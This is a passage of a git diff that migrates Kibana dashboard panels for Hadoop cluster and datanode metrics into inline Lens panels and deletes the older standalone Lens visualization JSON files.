"params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.applications.failed" + }, + "aac01fd6-85b3-4678-a105-90b6bfef291a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.applications.running: *" + }, + "isBucketed": false, + "label": "Running", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.applications.running" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6289f262-f60c-4d6c-9480-c8d037633755", + "key": "hadoop.cluster.applications.running", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.applications.running" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c26ffbdc-b9a3-4a13-870a-6e83389b4007", + "key": "hadoop.cluster.applications.pending", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.applications.pending" + } + } + }, + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "70536a90-2ac2-4561-a8ed-1d0b7897fb04", + "key": "hadoop.cluster.applications.failed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.applications.failed" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true + }, + "layers": [ + { + "accessors": [ + "aac01fd6-85b3-4678-a105-90b6bfef291a", + "2c271321-b9d9-4fc0-8bb4-0483f527c16b", + "88d60efa-e82b-43e6-bd18-e523c386af79" + ], + "layerId": "faa4a447-faac-4424-9e42-5a29b0ad1137", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "55139a89-d014-4b5e-9195-8d7874ae4a47", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "aac01fd6-85b3-4678-a105-90b6bfef291a" + }, + { + "axisMode": "left", + "forAccessor": "2c271321-b9d9-4fc0-8bb4-0483f527c16b" + }, + { + "axisMode": "left", + "forAccessor": "88d60efa-e82b-43e6-bd18-e523c386af79" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true + }, + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yTitle": "Applications" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "d78560b6-a798-4b6b-b702-252c1319af9c:70536a90-2ac2-4561-a8ed-1d0b7897fb04", - "type": "index-pattern" + "title": "Number of applications over time [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", + "w": 8, + "x": 0, + "y": 18 }, - { - "id": "metrics-*", - "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" + "panelIndex": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "446aea27-ddc3-4f7b-8623-2fe664c9af1d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { + "columnOrder": [ + "36a555dc-487f-4e1c-a3ae-2afa0f535519" + ], + "columns": { + "36a555dc-487f-4e1c-a3ae-2afa0f535519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.containers.allocated: *" + }, + "isBucketed": false, + "label": "Containers Allocated", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.containers.allocated" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "446aea27-ddc3-4f7b-8623-2fe664c9af1d", + "key": "hadoop.cluster.containers.allocated", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.containers.allocated" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", + "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:446aea27-ddc3-4f7b-8623-2fe664c9af1d", - "type": "index-pattern" + "title": "Number of containers allocated [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", + "w": 8, + "x": 8, + "y": 18 }, - { - "id": "metrics-*", - "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" + "panelIndex": "3078cc84-cf45-47c1-9761-a2cf0be99c2e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { + "columnOrder": [ + "36a555dc-487f-4e1c-a3ae-2afa0f535519" + ], + "columns": { + "36a555dc-487f-4e1c-a3ae-2afa0f535519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.containers.pending: *" + }, + "isBucketed": false, + "label": "Containers Pending", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.containers.pending" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "022a0e4d-13e0-47d7-8fd4-7fc3671f864d", + "key": "hadoop.cluster.containers.pending", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.containers.pending" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", + "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:022a0e4d-13e0-47d7-8fd4-7fc3671f864d", - "type": "index-pattern" + "title": "Number of containers pending [Metrics Hadoop]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "589a1406-7ccf-49b7-a6b7-618841e3339b", + "w": 8, + "x": 16, + "y": 18 }, - { - "id": "metrics-*", - "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", - "type": "index-pattern" + "panelIndex": "589a1406-7ccf-49b7-a6b7-618841e3339b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d1592d8a-7e50-4768-a449-a05551db392d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "570232b1-bbba-4ae8-aa47-ed60cfefb8fb": { + "columnOrder": [ + "36a555dc-487f-4e1c-a3ae-2afa0f535519" + ], + "columns": { + "36a555dc-487f-4e1c-a3ae-2afa0f535519": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.cluster.containers.reserved: *" + }, + "isBucketed": false, + "label": "Containers Reserved", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.cluster.containers.reserved" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d1592d8a-7e50-4768-a449-a05551db392d", + "key": "hadoop.cluster.containers.reserved", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.cluster.containers.reserved" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "36a555dc-487f-4e1c-a3ae-2afa0f535519", + "layerId": "570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "layerType": "data", + "size": "xxl", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" }, - { - "id": "metrics-*", - "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:d1592d8a-7e50-4768-a449-a05551db392d", - "type": "index-pattern" - } + "title": "Number of containers reserved [Metrics Hadoop]" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics Hadoop] Cluster overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:indexpattern-datasource-layer-35726819-8a70-4f5e-b150-1626c191f380", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:4b01387d-bd18-4e16-b860-005e4a71e957", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:d846e0a6-42a9-4840-82e4-f217959a63fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:c50d822a-587a-4198-90c1-847fe7355fa1", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "08fde296-94c6-4dbd-bd1f-77c67e0125e6:e78473e3-a006-46cf-bada-e75ab9c4b279", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e4ced3fd-72aa-4091-95cf-39d49d5bb17f:b880f665-29b3-40b9-bd45-459f3105c645", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9d55a200-501c-45bf-94a9-a3c36744865d:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9d55a200-501c-45bf-94a9-a3c36744865d:b98d7344-acd9-4e73-a62b-a34aee54465c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:indexpattern-datasource-layer-5199984c-035a-4e47-9d4a-d63d01735d8b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7d51338d-3c9a-4b7a-ae30-6b4efc0d2886:1965ff1a-73c8-4f6c-be65-230190b5ca22", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d78560b6-a798-4b6b-b702-252c1319af9c:indexpattern-datasource-layer-faa4a447-faac-4424-9e42-5a29b0ad1137", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d78560b6-a798-4b6b-b702-252c1319af9c:6289f262-f60c-4d6c-9480-c8d037633755", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d78560b6-a798-4b6b-b702-252c1319af9c:c26ffbdc-b9a3-4a13-870a-6e83389b4007", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d78560b6-a798-4b6b-b702-252c1319af9c:70536a90-2ac2-4561-a8ed-1d0b7897fb04", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "64c0ea7a-99ee-4c8f-a9cb-e6ea5c855272:446aea27-ddc3-4f7b-8623-2fe664c9af1d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3078cc84-cf45-47c1-9761-a2cf0be99c2e:022a0e4d-13e0-47d7-8fd4-7fc3671f864d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:indexpattern-datasource-layer-570232b1-bbba-4ae8-aa47-ed60cfefb8fb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "589a1406-7ccf-49b7-a6b7-618841e3339b:d1592d8a-7e50-4768-a449-a05551db392d", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index 677f7cf9153..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2.json +++ /dev/null @@ -1,223 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "69af342c-71f3-41fe-a76e-cc9f49baafa3": { - "columnOrder": [ - "797ebde1-9d7b-4950-9554-194d5c702684", - "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", - "4b9fcd50-2227-40e5-a93b-ebb16831630d", - "56fd6e61-acf3-45e6-9904-98f7ffa90644" - ], - "columns": { - "4b9fcd50-2227-40e5-a93b-ebb16831630d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes read", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.bytes.read" - }, - "56fd6e61-acf3-45e6-9904-98f7ffa90644": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes written", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.bytes.written" - }, - "797ebde1-9d7b-4950-9554-194d5c702684": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "fc0da319-4b72-4ccc-8e27-2c4ebec508c7": { - "dataType": "string", - "isBucketed": true, - "label": "Top values of service.address", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 3 - }, - "scale": "ordinal", - "sourceField": "service.address" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "fbe5ed56-727a-408f-ab58-b03abf1502da", - "key": "hadoop.datanode.bytes.read", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.datanode.bytes.read" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "37000496-671a-41ab-ab7b-35823e718530", - "key": "hadoop.datanode.bytes.written", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.datanode.bytes.written" - } - } - } - ], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"hadoop.datanode\" " - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "4b9fcd50-2227-40e5-a93b-ebb16831630d", - "56fd6e61-acf3-45e6-9904-98f7ffa90644" - ], - "layerId": "69af342c-71f3-41fe-a76e-cc9f49baafa3", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "fc0da319-4b72-4ccc-8e27-2c4ebec508c7", - "xAccessor": "797ebde1-9d7b-4950-9554-194d5c702684" - } - ], - "legend": { - "isVisible": true, - "legendSize": "auto", - "position": "right" - }, - "preferredSeriesType": "line", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Bytes" - } - }, - "title": "Number of bytes read and written [Hadoop Metrics]", - "visualizationType": "lnsXY" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-09305b10-cf75-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-69af342c-71f3-41fe-a76e-cc9f49baafa3", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fbe5ed56-727a-408f-ab58-b03abf1502da", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "37000496-671a-41ab-ab7b-35823e718530", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107.json b/packages/hadoop/kibana/lens/hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107.json deleted file mode 100644 index f9564bfcc41..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107.json +++ /dev/null @@ -1,110 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "bfc4ee7d-e67a-492c-a0de-3ba41b193e52": { - "columnOrder": [ - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" - ], - "columns": { - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Disk Capacity", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "median(hadoop.datanode.disk_space.capacity)", - "isFormulaBroken": false - }, - "references": [ - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0" - ], - "scale": "ratio" - }, - "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Disk Capacity (GB)", - "operationType": "median", - "scale": "ratio", - "sourceField": "hadoop.datanode.disk_space.capacity" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "87fdb03b-29d6-48a3-952a-da13b704e34a", - "key": "hadoop.datanode.disk_space.capacity", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.datanode.disk_space.capacity" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "f5aa20c5-3dfb-45e8-82ff-4a24d054ef62", - "layerId": "bfc4ee7d-e67a-492c-a0de-3ba41b193e52", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Data node disk capacity [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-2132d820-cd2f-11ec-be30-1d9331f0b107", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bfc4ee7d-e67a-492c-a0de-3ba41b193e52", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "87fdb03b-29d6-48a3-952a-da13b704e34a", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index 57f31fc2a84..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2.json +++ /dev/null @@ -1,88 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "efa00ae4-03e1-45c9-aaa9-47610de989d9": { - "columnOrder": [ - "5e28f952-df42-4162-8195-af6ee018c227", - "5e28f952-df42-4162-8195-af6ee018c227X0" - ], - "columns": { - "5e28f952-df42-4162-8195-af6ee018c227": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Cache used", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": "last_value(hadoop.datanode.cache.used)", - "isFormulaBroken": false - }, - "references": [ - "5e28f952-df42-4162-8195-af6ee018c227X0" - ], - "scale": "ratio" - }, - "5e28f952-df42-4162-8195-af6ee018c227X0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Cache used", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.cache.used" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"hadoop.datanode\" and hadoop.datanode.cache.capacity : * and hadoop.datanode.cache.used : * " - }, - "visualization": { - "accessor": "5e28f952-df42-4162-8195-af6ee018c227", - "layerId": "efa00ae4-03e1-45c9-aaa9-47610de989d9", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Cache used from total cache [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-73f3b470-cf74-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-efa00ae4-03e1-45c9-aaa9-47610de989d9", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index fa765412c59..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2.json +++ /dev/null @@ -1,67 +0,0 @@ -{ - "attributes": { - "description": "", - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "781bec53-7762-43ba-bc46-4a54c6b985ae": { - "columnOrder": [ - "931e5379-b427-4096-8030-51a9ad546b02" - ], - "columns": { - "931e5379-b427-4096-8030-51a9ad546b02": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Cached blocks", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.blocks.cached" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "hadoop.datanode.blocks.cached : * " - }, - "visualization": { - "accessor": "931e5379-b427-4096-8030-51a9ad546b02", - "layerId": "781bec53-7762-43ba-bc46-4a54c6b985ae", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Cached blocks [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-a6a8b400-cf75-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-781bec53-7762-43ba-bc46-4a54c6b985ae", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index cdb352528a1..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2.json +++ /dev/null @@ -1,66 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "011f4580-0ed6-43f2-aeb7-64965ecd5e83": { - "columnOrder": [ - "7fd9ea12-b127-443d-a3d9-a07be9982c13" - ], - "columns": { - "7fd9ea12-b127-443d-a3d9-a07be9982c13": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Failed volumes", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.datanode.volumes.failed" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "hadoop.datanode.volumes.failed : * " - }, - "visualization": { - "accessor": "7fd9ea12-b127-443d-a3d9-a07be9982c13", - "layerId": "011f4580-0ed6-43f2-aeb7-64965ecd5e83", - "layerType": "data", - "size": "xl", - "textAlign": "center", - "titlePosition": "bottom" - } - }, - "title": "Failed Volumes [Metrics Hadoop]", - "visualizationType": "lnsMetric" - }, - "coreMigrationVersion": "8.3.0", - "id": "hadoop-ace7b680-cf76-11ec-bc3e-6faca2b11df2", - "migrationVersion": { - "lens": "8.3.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-011f4580-0ed6-43f2-aeb7-64965ecd5e83", - "type": "index-pattern" - } - ], - "type": "lens" -} \ No newline at end of file diff --git a/packages/hadoop/kibana/lens/hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/lens/hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2.json deleted file mode 100644 index 6880e46cdca..00000000000 --- a/packages/hadoop/kibana/lens/hadoop-c4e16fe0-cf73-11ec-bc3e-6faca2b11df2.json +++ /dev/null @@ -1,92 +0,0 @@ -{ - "attributes": { - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ee57a119-2827-4586-82f1-c796c86d76d9": { - "columnOrder": [ - "abfc2ae3-27f7-4529-a9b9-01d7a9896323", - "0a1b5433-d3cf-4c1d-8e22-137912b624bb" - ], - "columns": { - "0a1b5433-d3cf-4c1d-8e22-137912b624bb": { - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - }, - "abfc2ae3-27f7-4529-a9b9-01d7a9896323": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Data node address", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "service.address" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "data_stream.dataset : \"hadoop.datanode\" " - }, - "visualization": { - "columns": [ - { - "columnId": "abfc2ae3-27f7-4529-a9b9-01d7a9896323", - "isTransposed": false - }, - { - "columnId": "0a1b5433-d3cf-4c1d-8e22-137912b624bb", - "isTransposed": false - } - ], - "layerId": "ee57a119-2827-4586-82f1-c796c86d76d9", - "layerType": "data", - "rowHeight": "single", - "rowHeightLines": 1 - } - }, - "title": "List of data node address [Metrics Hadoop]", - "visualizationType": "lnsDatatable" - }, - "coreMigrationVersion": 